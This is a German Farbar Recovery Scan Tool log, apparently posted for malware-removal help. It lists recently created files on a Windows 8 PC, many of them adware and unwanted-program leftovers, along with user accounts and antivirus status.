2016-01-31 18:50 - 2016-01-31 18:50 - 00000117 _____ C:\WINDOWS\system32\netcfg-13251421.txt
2016-01-31 15:05 - 2016-01-31 15:05 - 00000092 _____ C:\WINDOWS\system32\netcfg-16197750.txt
2016-01-31 14:52 - 2016-02-06 16:37 - 00003236 _____ C:\WINDOWS\System32\Tasks\IBUpd2
2016-01-31 14:50 - 2016-01-31 14:50 - 00000000 ____D C:\ProgramData\Brother
2016-01-31 14:49 - 2016-02-06 16:37 - 00000000 ____D C:\Users\Manz\AppData\Local\BrowserAir
2016-01-31 14:48 - 2016-01-31 21:40 - 00000000 ____D C:\Users\Manz\AppData\Roaming\dlg
2016-01-31 14:43 - 2016-01-31 14:43 - 00000117 _____ C:\WINDOWS\system32\netcfg-14853765.txt
2016-01-31 14:41 - 2016-02-06 16:49 - 00000000 ____D C:\Program Files (x86)\MPC Cleaner
2016-01-31 14:40 - 2016-02-06 18:49 - 00023208 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
2016-01-31 14:40 - 2016-02-06 16:33 - 00003398 _____ C:\WINDOWS\System32\Tasks\RSPro
2016-01-31 14:40 - 2016-02-06 16:33 - 00000000 ____D C:\Users\Manz\AppData\Local\SearchModule
2016-01-31 14:38 - 2016-01-31 14:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-14536734.txt
2016-01-31 14:38 - 2016-01-31 14:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-14533984.txt
2016-01-31 14:38 - 2016-01-31 14:38 - 00000000 ____D C:\ProgramData\b66d00b7-58c3-0
2016-01-31 14:38 - 2016-01-31 14:38 - 00000000 ____D C:\ProgramData\b66d00b7-3853-1
2016-01-31 14:36 - 2016-01-31 14:36 - 00000117 _____ C:\WINDOWS\system32\netcfg-14466015.txt
2016-01-31 14:35 - 2016-01-31 19:07 - 00000000 ____D C:\Program Files (x86)\Super Great
2016-01-31 14:35 - 2016-01-31 14:35 - 00003116 _____ C:\WINDOWS\System32\Tasks\Builder Touch2
2016-01-31 14:35 - 2016-01-31 14:35 - 00000117 _____ C:\WINDOWS\system32\netcfg-14391046.txt
2016-01-31 14:34 - 2016-02-01 19:20 - 00000000 ____D C:\Users\Manz\AppData\Roaming\systweak
2016-01-31 14:34 - 2016-01-31 14:35 - 00000117 _____ C:\WINDOWS\system32\netcfg-14348812.txt
2016-01-31 14:34 - 2016-01-31 14:35 - 00000000 ____D C:\ProgramData\2WdM2
2016-01-31 14:34 - 2016-01-31 14:34 - 00003128 _____ C:\WINDOWS\System32\Tasks\Builder Touch
2016-01-31 14:34 - 2016-01-31 14:34 - 00001139 _____ C:\WINDOWS\system32\netcfg-14346250.txt
2016-01-31 14:34 - 2016-01-31 14:34 - 00000000 ____D C:\Users\Manz\AppData\Local\Builder Touch
2016-01-31 14:34 - 2015-11-20 19:27 - 00019888 _____ () C:\WINDOWS\system32\roboot64.exe
2016-01-31 14:33 - 2016-01-31 19:04 - 00000000 ____D C:\Users\Manz\AppData\Roaming\yoursearching
2016-01-31 14:32 - 2016-01-31 14:32 - 00000000 ____D C:\Users\Manz\AppData\Local\rec_en_77
2016-01-31 14:32 - 2016-01-31 14:32 - 00000000 ____D C:\Program Files (x86)\rec_en_77
2016-01-31 14:30 - 2016-01-31 20:54 - 00000000 ____D C:\Program Files (x86)\SearchesToYesbnd
2016-01-31 14:30 - 2016-01-31 14:30 - 00000000 ____D C:\Users\Manz\AppData\Local\F727A298-4DB4-456A-AC54-A93EA5F8554D
2016-01-31 14:30 - 2016-01-31 14:30 - 00000000 ____D C:\Users\Manz\AppData\Local\3810282D-6C19-47B0-8283-5C6C29A7E108
2016-01-31 14:30 - 2016-01-31 14:30 - 00000000 ____D C:\Program Files (x86)\B5B53C54-1454247040-E111-8F5D-B888E3A0B275
2016-01-31 14:29 - 2016-01-31 14:30 - 00000000 ____D C:\Users\Public\Documents\dmp
2016-01-31 14:26 - 2016-01-31 21:37 - 00000000 ____D C:\Program Files (x86)\SFK
2016-01-31 14:26 - 2016-01-31 14:34 - 00000074 _____ C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
2016-01-31 14:26 - 2016-01-31 14:27 - 00000000 ____D C:\ProgramData\DWdMD
2016-01-31 14:25 - 2016-02-01 19:22 - 00000000 ____D C:\Users\Manz\AppData\Roaming\istartpageing
2016-01-31 14:22 - 2016-02-06 18:44 - 00000000 ____D C:\Users\Manz\AppData\Local\gmsd_de_005010223
2016-01-31 14:22 - 2016-02-06 16:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GAMESDESKTOP
2016-01-31 14:22 - 2016-01-31 14:22 - 00000000 ____D C:\Program Files (x86)\gmsd_de_005010223
2016-01-31 14:20 - 2016-02-06 16:33 - 00000592 _____ C:\task.vbs
2016-01-31 14:19 - 2016-01-31 14:24 - 01080312 _____ (Mozilla) C:\Users\Manz\Downloads\Thunderbird Setup 38.5.1(1).exe.part
2016-01-31 14:18 - 2016-02-06 18:45 - 00005120 _____ C:\WINDOWS\SysWOW64\mgc100enu.dll
2016-01-31 14:18 - 2016-01-31 20:45 - 00000000 ____D C:\Program Files (x86)\QuickSearch
2016-01-31 14:16 - 2016-02-06 16:32 - 00000008 _____ C:\END
2016-01-31 14:16 - 2016-02-06 16:32 - 00000000 ____D C:\Program Files\SpaceSoundPro
2016-01-31 14:16 - 2016-01-31 20:02 - 00000000 ____D C:\Program Files (x86)\SpaceSondPro_v53.12571
2016-01-31 14:16 - 2016-01-31 14:16 - 00000000 ____D C:\Program Files (x86)\SpaceSondPro
2016-01-31 14:13 - 2016-02-01 19:17 - 00000000 ____D C:\ProgramData\Avg
2016-01-31 14:12 - 2016-01-31 14:12 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-01-31 14:09 - 2016-02-06 18:45 - 00000306 __RSH C:\ProgramData\ntuser.pol
2016-01-31 14:09 - 2016-01-31 14:18 - 33940552 _____ (Mozilla) C:\Users\Manz\Downloads\Thunderbird Setup 38.5.1.exe
2016-01-31 14:08 - 2016-02-01 19:00 - 00000000 ____D C:\Users\Manz\AppData\Local\AvgSetupLog
2016-01-31 14:08 - 2016-01-31 21:39 - 00000000 ____D C:\Users\Manz\AppData\Local\Avg
2016-01-31 14:07 - 2016-01-31 14:09 - 00151072 _____ C:\WINDOWS\system32\DnsBlockUpdateSvc.exe
2016-01-31 14:07 - 2016-01-31 14:07 - 00471968 _____ C:\WINDOWS\SysWOW64\dns.block
2016-01-31 14:07 - 2016-01-31 14:07 - 00471968 _____ C:\WINDOWS\system32\dns.block
2016-01-31 14:07 - 2016-01-31 14:07 - 00000000 ____D C:\Users\Manz\AppData\Local\DnsBlock
2016-01-31 14:06 - 2016-02-06 18:48 - 00000000 ____D C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275
2016-01-31 14:06 - 2016-01-31 14:03 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-01-31 14:04 - 2016-02-06 16:33 - 00001834 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-01-31 14:04 - 2016-01-31 20:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-01-31 14:04 - 2016-01-31 20:02 - 00000000 ____D C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275
2016-01-31 14:04 - 2016-01-31 14:11 - 00000000 ____D C:\Users\Manz\AppData\Local\Mozilla
2016-01-31 14:04 - 2016-01-31 14:05 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Mozilla
2016-01-31 14:03 - 2016-01-31 14:03 - 00023214 _____ C:\WINDOWS\System32\Tasks\{0D0B7D47-0F7D-040B-7811-090D050F117E}
2016-01-31 14:03 - 2016-01-31 14:03 - 00000000 ____D C:\ProgramData\8da658ec-7697-0
2016-01-31 14:03 - 2016-01-31 14:03 - 00000000 ____D C:\ProgramData\8da658ec-0995-1
2016-01-31 14:00 - 2016-01-31 14:00 - 00003440 _____ C:\WINDOWS\System32\Tasks\Genius_Interval
2016-01-31 14:00 - 2016-01-31 14:00 - 00003090 _____ C:\WINDOWS\System32\Tasks\Genius
2016-01-31 14:00 - 2016-01-31 14:00 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Genius
2016-01-31 14:00 - 2016-01-31 14:00 - 00000000 ____D C:\Users\Manz\AppData\Local\ext_funfeedr
2016-01-31 13:59 - 2016-01-31 18:49 - 00002912 _____ C:\WINDOWS\SysWOW64\LavasoftTcpServiceOff.ini
2016-01-31 13:59 - 2016-01-31 18:49 - 00002912 _____ C:\WINDOWS\system32\LavasoftTcpServiceOff.ini
2016-01-31 13:59 - 2016-01-31 13:59 - 00425744 _____ (Lavasoft Limited) C:\WINDOWS\system32\LavasoftTcpService64.dll
2016-01-31 13:59 - 2016-01-31 13:59 - 00345360 _____ (Lavasoft Limited) C:\WINDOWS\SysWOW64\LavasoftTcpService.dll
2016-01-31 13:59 - 2016-01-31 13:59 - 00000000 ____D C:\Program Files (x86)\Lavasoft
2016-01-31 13:57 - 2016-01-31 13:57 - 00000000 ____D C:\Users\Manz\AppData\Local\clear.fi
2016-01-31 13:57 - 2016-01-31 13:57 - 00000000 ____D C:\ProgramData\Lavasoft
2016-01-31 13:54 - 2016-01-31 20:37 - 00000000 ____D C:\Users\Manz\AppData\Roaming\WildTangent
2016-01-31 13:50 - 2016-01-31 13:50 - 01132240 _____ (Software Assistant) C:\Users\Manz\Downloads\firefox_download (1).exe
2016-01-31 13:46 - 2016-01-31 13:46 - 01137872 _____ (Software Assistant) C:\Users\Manz\Downloads\firefox_download.exe
2016-01-31 13:44 - 2016-01-31 13:44 - 00000000 ____D C:\Users\Manz\AppData\Local\EgisTec IPS
2016-01-31 13:43 - 2016-02-06 18:49 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2229505580-413648313-3343944023-1002
2016-01-31 13:40 - 2014-05-20 03:33 - 00059416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-01-31 13:40 - 2014-05-20 00:45 - 00629248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-01-31 13:40 - 2014-05-20 00:45 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 03286528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 01623040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00773632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-01-31 13:40 - 2014-05-20 00:24 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2016-01-31 13:40 - 2014-05-14 23:43 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2016-01-31 13:40 - 2014-05-14 23:43 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2016-01-31 13:40 - 2014-05-14 23:42 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2016-01-31 13:40 - 2014-05-14 23:42 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2016-01-31 13:40 - 2013-08-16 06:21 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-01-31 13:40 - 2013-08-16 06:21 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-01-31 13:40 - 2013-08-15 23:43 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2016-01-31 13:40 - 2012-11-06 05:20 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaext.dll
2016-01-31 13:40 - 2012-11-06 05:00 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wushareduxresources.dll
2016-01-31 13:38 - 2016-01-31 13:38 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Macromedia
2016-01-31 13:36 - 2016-02-06 16:33 - 00001624 _____ C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Atheros
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Users\Manz\AppData\Roaming\Adobe
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Program Files\Preload
2016-01-31 13:36 - 2016-01-31 13:36 - 00000000 ____D C:\Program Files\Accessory Store
2016-01-31 13:35 - 2016-01-31 13:35 - 00000000 ____D C:\Users\Manz\AppData\Local\VirtualStore
2016-01-31 13:34 - 2016-01-31 13:36 - 00000000 ____D C:\Users\Manz\AppData\Local\Packages
2016-01-31 13:34 - 2016-01-31 13:34 - 00000117 _____ C:\WINDOWS\system32\netcfg-10714812.txt
2016-01-31 13:34 - 2016-01-31 13:34 - 00000117 _____ C:\WINDOWS\system32\netcfg-10714468.txt
2016-01-31 13:34 - 2016-01-31 13:34 - 00000020 ___SH C:\Users\Manz\ntuser.ini
2016-01-31 12:06 - 2016-01-31 12:06 - 00000117 _____ C:\WINDOWS\system32\netcfg-5452000.txt
2016-01-31 12:06 - 2016-01-31 12:06 - 00000117 _____ C:\WINDOWS\system32\netcfg-5449984.txt
2016-01-31 11:54 - 2016-01-31 11:54 - 00000117 _____ C:\WINDOWS\system32\netcfg-4734765.txt
2016-01-31 11:54 - 2016-01-31 11:54 - 00000117 _____ C:\WINDOWS\system32\netcfg-4734703.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-177156.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-176171.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000117 _____ C:\WINDOWS\system32\netcfg-173796.txt
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Vorlagen
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Startmenü
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Netzwerkumgebung
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Lokale Einstellungen
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Eigene Dateien
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Druckumgebung
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Videos
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Musik
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Bilder
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\AppData\Local\Verlauf
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\AppData\Local\Anwendungsdaten
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Users\Default\Anwendungsdaten
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Vorlagen
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Startmenü
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Microsoft\Windows\Start Menu\Programme
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Dokumente
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\ProgramData\Anwendungsdaten
2016-01-31 10:38 - 2016-01-31 10:38 - 00000000 _SHDL C:\Program Files\Gemeinsame Dateien
2016-01-31 10:37 - 2016-01-31 20:08 - 00000000 ____D C:\Users\Manz
2016-01-31 10:37 - 2016-01-31 10:38 - 00024768 _____ C:\WINDOWS\diagwrn.xml
2016-01-31 10:37 - 2016-01-31 10:38 - 00024768 _____ C:\WINDOWS\diagerr.xml
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Vorlagen
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Startmenü
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Netzwerkumgebung
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Lokale Einstellungen
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Eigene Dateien
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Druckumgebung
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Documents\Eigene Videos
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Documents\Eigene Musik
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Documents\Eigene Bilder
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\AppData\Local\Verlauf
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\AppData\Local\Anwendungsdaten
2016-01-31 10:37 - 2016-01-31 10:37 - 00000000 _SHDL C:\Users\Manz\Anwendungsdaten
2016-01-31 10:36 - 2016-01-31 10:36 - 00000117 _____ C:\WINDOWS\system32\netcfg-73703.txt
2016-01-31 10:35 - 2016-01-31 10:35 - 00000000 ____D C:\Windows.old
2016-01-31 10:34 - 2016-01-31 10:34 - 00262144 _____ C:\WINDOWS\system32\config\userdiff
2016-01-31 10:10 - 2016-01-31 10:10 - 00000000 ____D C:\$WINDOWS.~BT
2016-01-31 10:07 - 2016-01-31 10:09 - 00000000 ___HD C:\$SysReset
2016-01-20 14:27 - 2016-01-20 14:27 - 00001379 _____ C:\Users\Manz\Downloads\URLLink(16).acsm
2016-01-18 17:14 - 2016-01-18 17:14 - 00012193 _____ C:\Users\Manz\Documents\Entschuldigungsschreiben (Sport).odt
2016-01-18 17:00 - 2016-01-18 17:00 - 00021980 _____ C:\Users\Manz\Documents\Entschuldigungsschreiben Sport..pdf
2016-01-18 16:58 - 2016-01-18 16:58 - 00021979 _____ C:\Users\Manz\Documents\Entschuldigungsschreiben Sport.pdf
2016-01-18 16:44 - 2016-01-18 16:48 - 00022587 _____ C:\Users\Manz\Documents\ANGST IST ZUM ÜBERWINDEN DA..odt
2016-01-18 15:53 - 2016-01-18 15:54 - 00020797 _____ C:\Users\Manz\Documents\NICHT JEDER KANN IN ALLEM GUT SEIN.odt
2016-01-10 15:44 - 2016-01-10 15:44 - 00001503 _____ C:\Users\Manz\Downloads\URLLink(15).acsm
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2016-02-06 18:51 - 2012-08-03 03:29 - 00001792 _____ C:\Users\Public\Desktop\McAfee Internet Security Suite.lnk
2016-02-06 18:50 - 2012-07-26 08:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-06 18:47 - 2012-09-11 22:36 - 00753134 _____ C:\WINDOWS\system32\perfh007.dat
2016-02-06 18:47 - 2012-09-11 22:36 - 00155826 _____ C:\WINDOWS\system32\perfc007.dat
2016-02-06 18:47 - 2012-07-26 08:28 - 01745416 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-06 18:47 - 2012-07-26 06:37 - 00000000 ____D C:\WINDOWS\Inf
2016-02-06 18:45 - 2012-08-03 03:28 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-02-06 18:43 - 2012-07-26 08:22 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-06 16:40 - 2012-07-26 06:26 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-02-01 19:49 - 2012-07-26 06:26 - 00262144 ___SH C:\WINDOWS\system32\config\ELAM
2016-02-01 19:30 - 2012-09-11 13:25 - 00001024 ___RH C:\Users\Public\Documents\NTIMMV9Acer.dll
2016-02-01 19:30 - 2012-08-03 03:28 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-01-31 21:37 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-01-31 21:34 - 2012-09-11 12:52 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-01-31 21:00 - 2012-09-11 13:08 - 00000000 ____D C:\Program Files (x86)\Qualcomm Atheros
2016-01-31 20:46 - 2012-09-11 12:56 - 00000000 ___HD C:\Program Files (x86)\Temp
2016-01-31 20:37 - 2012-08-03 03:26 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-01-31 20:37 - 2012-08-03 03:26 - 00000000 ____D C:\ProgramData\WildTangent
2016-01-31 20:34 - 2012-08-03 03:29 - 00000000 ____D C:\Program Files (x86)\Acer
2016-01-31 20:32 - 2012-08-03 03:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer
2016-01-31 20:07 - 2012-08-03 03:22 - 00000000 ____D C:\Users\Administrator
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\WinStore
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\Cursors
2016-01-31 20:06 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Windows Defender
2016-01-31 20:04 - 2012-07-26 09:12 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-01-31 20:01 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\registration
2016-01-31 20:01 - 2012-07-26 06:38 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-01-31 20:01 - 2012-07-26 06:37 - 00000000 ____D C:\WINDOWS\servicing
2016-01-31 20:00 - 2012-09-11 13:26 - 00000000 ____D C:\ProgramData\Norton
2016-01-31 20:00 - 2012-09-11 13:03 - 00000000 ____D C:\Program Files (x86)\Bluetooth Suite
2016-01-31 20:00 - 2012-08-03 03:30 - 00000000 ____D C:\ProgramData\Temp
2016-01-31 20:00 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-01-31 20:00 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Common Files\System
2016-01-31 20:00 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-01-31 20:00 - 2012-07-26 08:52 - 00000000 ____D C:\Program Files\Windows Journal
2016-01-31 18:56 - 2012-08-03 03:28 - 00000000 ____D C:\ProgramData\McAfee
2016-01-31 15:10 - 2012-07-26 08:19 - 00281248 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-01-31 14:21 - 2012-09-11 13:26 - 00000000 ____D C:\ProgramData\NortonInstaller
2016-01-31 14:21 - 2012-09-11 12:57 - 00000000 ____D C:\Dolby PCEE4
2016-01-31 13:37 - 2012-08-03 04:18 - 00000000 ___HD C:\OEM
2016-01-31 13:36 - 2012-09-11 13:23 - 00000000 ____D C:\ProgramData\OEM
2016-01-31 13:34 - 2012-07-26 09:12 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-01-31 11:55 - 2012-08-03 04:21 - 00000000 ___DC C:\WINDOWS\Panther
2016-01-31 10:38 - 2012-07-26 09:12 - 00000000 __RHD C:\Users\Public\Libraries
2016-01-31 10:38 - 2012-07-26 09:12 - 00000000 ____D C:\Program Files\Windows NT
2016-01-31 10:36 - 2012-07-26 09:12 - 00000000 ____D C:\WINDOWS\tracing
2016-01-31 10:35 - 2012-07-26 09:13 - 00262144 _____ C:\WINDOWS\system32\config\BCD-Template
2016-01-20 14:30 - 2014-06-24 18:44 - 00000000 ____D C:\Users\Manz\Documents\My Digital Editions
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2016-02-01 19:37 - 2016-02-06 16:37 - 0000099 _____ () C:\Users\Manz\AppData\Roaming\WB.CFG
2012-09-11 12:57 - 2012-09-11 12:57 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-01-31 14:26 - 2016-01-31 14:34 - 0000074 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
C:\Users\Manz\setup.exe
Einige Dateien in TEMP:
====================
C:\Users\Manz\AppData\Local\Temp\113C.tmp.exe
C:\Users\Manz\AppData\Local\Temp\1CAC.tmp.exe
C:\Users\Manz\AppData\Local\Temp\2E52.tmp.exe
C:\Users\Manz\AppData\Local\Temp\2EA8.tmp.exe
C:\Users\Manz\AppData\Local\Temp\3D62.tmp.exe
C:\Users\Manz\AppData\Local\Temp\4156.tmp.exe
C:\Users\Manz\AppData\Local\Temp\42AC.tmp.exe
C:\Users\Manz\AppData\Local\Temp\6731.tmp.exe
C:\Users\Manz\AppData\Local\Temp\6B14.tmp.exe
C:\Users\Manz\AppData\Local\Temp\7671.tmp.exe
C:\Users\Manz\AppData\Local\Temp\8819.tmp.exe
C:\Users\Manz\AppData\Local\Temp\AcerCloudDocsSetup.exe
C:\Users\Manz\AppData\Local\Temp\amisetup3427__17454.exe
C:\Users\Manz\AppData\Local\Temp\amisetup4281__17454.exe
C:\Users\Manz\AppData\Local\Temp\amisetup7063__17454.exe
C:\Users\Manz\AppData\Local\Temp\apptemp.1.exe
C:\Users\Manz\AppData\Local\Temp\AskSLib.dll
C:\Users\Manz\AppData\Local\Temp\BUFVLDZZ5C.exe
C:\Users\Manz\AppData\Local\Temp\C3A.tmp.exe
C:\Users\Manz\AppData\Local\Temp\C4ED.tmp.exe
C:\Users\Manz\AppData\Local\Temp\C558.tmp.exe
C:\Users\Manz\AppData\Local\Temp\CD51.tmp.exe
C:\Users\Manz\AppData\Local\Temp\E9CC.tmp.exe
C:\Users\Manz\AppData\Local\Temp\FGYPQQUV1U.exe
C:\Users\Manz\AppData\Local\Temp\fsd25BB.exe
C:\Users\Manz\AppData\Local\Temp\fsd4424.exe
C:\Users\Manz\AppData\Local\Temp\ICReinstall_1CAC.tmp.exe
C:\Users\Manz\AppData\Local\Temp\oprun30695.exe
C:\Users\Manz\AppData\Local\Temp\setup.tmp.exe
C:\Users\Manz\AppData\Local\Temp\ShammedFourposter.dll
C:\Users\Manz\AppData\Local\Temp\Uninstall.exe
==================== Bamital & volsnap =================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll
[2012-07-26 01:09] - [2012-07-26 01:09] - 0604672 ____A (Microsoft Corporation) 2371BB2CFE1FDFB87426FDD8E71F1E65
C:\WINDOWS\SysWOW64\dnsapi.dll
[2012-07-26 01:11] - [2012-07-26 01:11] - 0461312 ____A (Microsoft Corporation) 0F96350F9D1A583F921B3666348F2DE1
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-01-2016
durchgeführt von Manz (2016-02-06 19:10:49)
Gestartet von E:\
Windows 8 (X64) (2016-01-31 10:55:10)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-2229505580-413648313-3343944023-500 - Administrator - Disabled) => C:\Users\Administrator
Gast (S-1-5-21-2229505580-413648313-3343944023-501 - Limited - Disabled)
Manz (S-1-5-21-2229505580-413648313-3343944023-1002 - Administrator - Enabled) => C:\Users\Manz
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: McAfee Anti-Virus und Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
